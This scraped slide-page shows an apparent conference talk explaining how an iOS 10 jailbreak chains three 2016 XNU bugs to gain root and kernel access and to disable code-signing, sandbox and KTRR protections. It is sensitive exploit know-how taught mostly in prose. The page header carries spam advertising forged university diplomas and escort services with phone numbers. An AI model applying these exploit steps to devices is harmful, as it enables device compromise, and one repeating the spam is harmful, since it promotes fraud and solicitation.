如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
 
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | DelhiFULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
 
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
 
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
 
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
 
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
 

Stunning Guards for iOS Jailbreak

  • 1. Take a Jailbreak - Stunning Guards for iOS Jailbreak - Kaoru Otsuka
  • 2. Who am I • An iOS hacking enthusiast • A first-grade high school student at Waseda University High School
  • 3. Summary • Escalation to root • Escalation to kernel • Disabling mitigations for post exploitations This talk explains the following 3 Methods
  • 4. The bugs • Those bugs are found by Ian beer who is at googleprojectzero • CVE-2016-7637
 - Broken kernel mach port name uref handling on iOS/MacOS can lead to privileged port name replacement in other processes • CVE-2016-7644
 - XNU kernel UaF due to lack of locking in set_dp_control_port • CVE-2016-7661
 - MacOS/iOS arbitrary port replacement in powerd
  • 5. Attack vector • CVE-2016-7637 and CVE-2016-7661 to privilege escalation to root • CVE-2016-7644 to gain the kernel task port • Applying patches to disable a bunch of mitigations
  • 6. CVE-2016-7637 This vulnerability can be applied to MITM attack 
 and leads us to gain a root task port.
  • 7. CVE-2016-7637 • The bug is basically a mistake of an buffer overflow checking (but not buffer overflow bug in ipc_right_copyout)
  • 8. CVE-2016-7637 • What’s the meaning of “pegging”? • Suppose it is to prevent a sort of buffer overflow and wrap around to 0 • But the concept of “pegging” is hardly used in xnu • Can we exploit it?
  • 9. Mach IPC system • The ports targeting on this exploit are related to ipc_entry Source: “Through the mach portal”, ianbeer https://bugs.chromium.org/p/project-zero/issues/attachment?aid=280146
  • 10. CVE-2016-7637 • The point is that
 UREFS count is exceeded at 0xFFFE 
 and send “overflow” message to the target port • The next UREFS count being supposed to be 0xFFFF will result in still retaining the UREFS count being 0xFFFE • So it’s promoted to an out-of-sync vulnerability • Let’s take a look at the inside of this exploit in the next slide
  • 11. CVE-2016-7637 • The applied technique is sending 0x10000 messages (of the same send right) to the target port • The messages are made to be freed in the process of mach_msg_server (sending invalid messages) • Spraying those malicious messages to target port’s UREFS and they will be freed after they are counted to UREFS • This cause the target port being freed! • Let’s reallocate there and take control of the target port
  • 12. CVE-2016-7637 • There’s a strategy to mitigate for the reallocation of a port and using it (like Use-After-Free) • “ipc_entry” has an entry of generation number (in “ie_bits”) • Generation number entry consists of 6bits bit field. • Generation number will be checked on the userspace/ kernelspace boundary • Incrementing generation number program is below
  • 13. CVE-2016-7637 • Generation number is up to 64 (not overlapping) • So we need a primitive that allows us to loop generation number around to match the generation number at 64th reallocating • Exploiting reliably, the target port needs to locate at the approximately middle of the freelist
  • 14. ipc_entry freelist • It’s a simple LIFO list. • Though the value indicating the next node isn’t an address but an index of “is_table” • Unlinking the entry from freelist, old head becomes our next node
  • 15. CVE-2016-7637 • This topic is to enhance the reliability for this exploit • Sending N messages (reallocating and freed soon) for the sake of target port to be down the freelist • After that, sending 62 loops of 2N messages to increment target port’s generation number
  • 16. CVE-2016-7637 • Review this exploit • Carry out the UREFS bug • Sending N messages • Sending 62 loop of 2N messages • Target port’s generation number will have been matched
  • 17. What’s suitable for the target port? • We need a send right for that port • The kernel ports can’t be consumed since kernel-owned ports are looked up each time (e.g. bad setting for generation number) • launchd is a great service
  • 18. launchd • com.apple.iohideventsystem can be accessed inside the sandbox and approved to have send right • Thanks to insecurities of Apple, com.apple.iohideventsystem receives the task port from client of it • Man-In-The-Middling the target port to capture the task port gives us root task port
  • 19. Task port • Task port is assigned per task • Task port can be obtained by task_for_pid though this API is so restricted • If we have the task port, we can do anything on its process.
  • 20. CVE-2016-7661 • Powerd is a client of com.apple.iohideventsystem • Powerd runs as root • Crashing powerd process (CVE-2016-7661) brings the target port to receive powerd’s task port
  • 21. This vulnerability leads us to gain kernel task port CVE-2016-7644
  • 22. ipc_port • ipc_entry has a reference to ipc_port (ie_object) • ipc_entry has only reference for ipc_port object • It’s maintained in zones which allocated by zone allocator
  • 23. CVE-2016-7644 • This vulnerability is a sort of Use-After-Free • set_dp_control_port is only called from root task port so we can’t use this bug without previous exploiting
  • 24. CVE-2016-7644 • Threads can race to see the same value for dynamic_pager_control_port and release it • ipc_port_release_send decrements the reference count io_references
  • 25. How we know the reference count 
 io_references
 hits 0?
  • 26. CVE-2016-7644 • MIG has the feature named no-more-senders notification to notify us if there’s no ip_srights by ipc_port_release_send
 • The total count of senders ip_srights is decremented as well as the reference count • So we’ll use the advantage to notice when it reaches to 0
  • 27. no-more-senders • ipc_port_release_send drops one reference and one send right for that port • ipc_notify_no_senders sends port->nsrequest port when port becomes no-more-senders
  • 29. ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB Making a reference for that port 2 references 1 send right portB has send right to portA though doesn’t receive from portA
  • 30. ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 3 references 2 send right portC PortC will be the receiver of no-more-senders notification
  • 34. ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 1 references 0 send right portC send no-more- We could get the notification so we won the race!
  • 35. ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 1 references 0 send right portC Then, what will happen if the portB will be destroyed?
  • 36. ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object 0 references 0 send right portC Then, what will happen if the portB will be destroyed?
  • 37. ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries ie_object 0 references 0 send right What’s ie_object pointing to? The ipc_entry->ie_object becomes a dangling pointer!
  • 38. zalloc • zalloc is a system call that assigns zones corresponding to the size • zalloc have a local freelist per zone • zones are freed by memory pressures or mach_force_zone_gc
  • 39. CVE-2016-7644 • There are zones for ipc_port as I said before • We allocate a ram_mb*20 number of ports (early ports) • And we alllocate 20 of ports (middle ports) • Finally, we allocate 5000 of ports (late ports) • Not forget to prepare stashed port (corresponding to portB) for all of ports we allocated
  • 40. CVE-2016-7644 • Causes the bug for each middle ports • Destroy the stashed ports • Eventually we’ve made ipc_entries point into dangling port pointers
  • 41. CVE-2016-7644 • Make the page be able to reallocate other kind of zones(currently it’s for ipc_ports) to capture the kernel port • We here use another technique to gain kernel task port
  • 42. Fake ipc_port • Use dangling ipc_ports to retrieve or write ip_context • Overlapping the zone we targeted on using ool_ports • ool_ports will misunderstand ipc_ports members Source: “Through the mach portal”, ianbeer https://bugs.chromium.org/p/project-zero/issues/ attachment?aid=280146
  • 43. CVE-2016-7644 • We are aiming to get the kernel task port • The kernel task port are supposed to be allocated at bootstrapping kernel which is probably at the first page of ipc_ports • And we can get/set the ip_context of ipc_ports (with mach_port_{set|get}_context)
  • 44. CVE-2016-7644 • Rewrite the every ip_context of dangling ipc_ports to the addresses which are around the middle of first ipc_ports’ page
 (This is CORE technique of our Jailbreak) • There is a kernelspace to userspace conversion function 
 which converts “port address” to “port object” • Using this conversion, once our dangling ipc_ports’ ipc_context will be rewritten to the address of kernel task ports, the overlapped ool_ports (whose host_port) becomes kernel_task port with some probability! • As a result, the ool_ports can be used for receiving kernel_task_port from userspace tasks. 
 This enables our userspace task to manipulate kernel memory in any way!
  • 45. Process handling in xnu • Process handling implementation in xnu is similar to one in BSD • There is a great deal of benefits to compromise a couple of values in the exact structure
  • 46. Privilege Escalation • Most exploits in various platforms likely use this sort of technique • “proc” structure is provided by per process • “allproc” variable holds a single linked list for every process’s “proc” • Rewriting flags and credentials inside “proc” structure!
  • 47. “proc” structure struct proc { LIST_ENTRY(proc) p_list; /* List of all processes. */ pid_t p_pid; /* Process identifier. (static)*/ void * task; /* corresponding task (static)*/ struct proc * p_pptr; /* Pointer to parent process.(LL) */ pid_t p_ppid; /* process's parent pid number */ pid_t p_pgrpid; /* process group id of the process (LL)*/ uid_t p_uid; gid_t p_gid; uid_t p_ruid; ..... kauth_cred_t p_ucred; /* Process owner's identity. (PUCL) */ ..... uint32_t p_csflags; /* flags for codesign (PL) */ ..... • At first glance, we just rewrite the values “p_uid” and “p_gid” • But these fields are’t used inside the kernel process maintaining system • The real one is inside the “p_ucred” structure!
  • 48. “kauth_cred_t” • “typedef struct ucred *kauth_cred_t;” • “ucred” structure is the original credential maintainer • So we should do is to copy a highly privileged credential to our process
  • 49. p_csflags • Flags for codesign • Just a 32bit bitfield • Attributes are defined in bsd/sys/codesign.h • Editing several values to allow/deny options
  • 50. p_csflags • flag |= CS_PLATFORM_BINARY|CS_INSTALLER| CS_GET_TASK_ALLOW • This allows us to obtain a task from another process • flag &= ~(CS_RESTRICT|CS_KILL|CS_HARD); • Omitting complicated options
  • 51. • Until 2 months ago, it was called KPP but now it is called KTRR or AMCC • The most annoying mitigation for jailbreakers • Based on arm’s TrustZone technology • As of xnu-4570.1.46, it became partially open-sourced (there seems no sync_handler implementation) AMCC
  • 52. AMCC • There are 4 privilege level being established in Trustzone • EL0 - User-space programs are running here • EL1- Kernel and iBoot(Bootloader) • EL2 - Unused in iOS • EL3 - AMCC/KTRR
  • 53. AMCC • AMCC’s strategy is the kernel regions with read-only or read|exec-only permissions to be guaranteed unmodified • If these regions are determined as an invalid region, AMCC causes kernel panic • Bypass the regions checking loop so that giving us to write anywhere
  • 54. AMCC • In theory, it is inevitable • Though in practice, it is not inevitable • Let’s get started into arm abyss!
  • 55. AMCC • AMCC needs to retrieve several system registers to know the kernel space states or user space states • We can set these registers if we have kernel execution
  • 56. System Registers • TTBR1_EL1
 The TTBR1_EL1 controls the base address of translation table 1
 • CPACR_EL1
 The CPACR_EL1 controls access to floating-point, and Advanced SIMD functionality from EL0, EL1, and EL3.
 The flag register “CPACR_EL1.FPEN” called “NEON” determines if it traps
  • 57. The loop EL0 FPU Execution EL3 Executes sync_handler EL0 or EL1 IRQ Execution EL3 Executes Watchtower
  • 58. sync_handler • It’s the core of AMCC • Supposed it checks KTRR regions integrity and registers integrity • If there’s invalid pages it will trigger kernel panic • It sets CPACR_EL1 to not to trap FPU instruction
  • 59. Watchtower • It will be called by IRQ instruction • Its source is located at osfmk/arm64/locore.s • Restoring a bunch of register and CPACR_EL1 to trap any instruction in EL0 and EL1
  • 60. The solution • Referred to @qwertyoruiopz Yalu102 jailbreak • 1st, load dummy Translation Table Base address to TTBR1_EL1 • 2nd, hit CPACR_EL1 not to be trapped by EL3
 (but it triggers check on EL3 now) • 3rd, load fake Translation Table Base address to TTBR1_EL1 • 4th, executes “tlbi vmalle1” to invalidate all stage 1 translations • And patching instruction touching cpacr to nop
  • 61. The solution • The code is below
  • 62. Shadowmapping technique • gVirtbase - virtual address of translation table entries • gPhybase - physical address of translation table entries • Both of them is stored in pmap structure • The technique is replacing original Translation Table Entry to our fake Translation Table Entry so that giving us write permission to executable pages
  • 63. Problem • TTBR_EL1 will be reset to 0 on sleeping • There are 2 kinds of sleeping • Idle sleep 
 sleeping when cpu is idle • Deep sleep
 sleeping when the screen has been black out for more than 30 seconds • The state of them is stored in “struct cpu_data>interrupt_handler”
  • 64. AMFI • Apple Mobile File Integrity • Exist as a daemon and a kext • The reason why it is targeted by attacker is that its kext audits the binary’s entitlements, code signing and MAC(Mandatory Access Control) policy
  • 65. PE_i_can_has_debugger • Patching a1 for the function to always return true • If the function always returns true, many of the checks in the kernel will turn off
  • 66. Disabling sandbox • MAC policies are stored at “mac_policy_conf->mac_ops” • These policies needs to be disable for jailbreaking • Just rewrite those pointers to be null
  • 67. LwVM • Light-weight Volume Manager • LwVM wraps GPT • _mapForIO traps the root partition writing • Partition object which mark it lock by a flag is held on heap • Removing this flag to write anywhere in the root partition
  • 68. Remount rootfs • mac_mount prevents mounting root partition as r/w • Bypassing this protection is as the same doing as we did in LwVM • vnode(checked every mounting on) have a flag • Remove that flag and remounting root partition
  • 69. References • Through the mach portal (by ian beer) • yalu102 (by Luca Todesco) • iOS 10 Kernel Heap Revisited (by Stefan Esser) • Mac OS X and iOS Internals (by Jonathan Levin)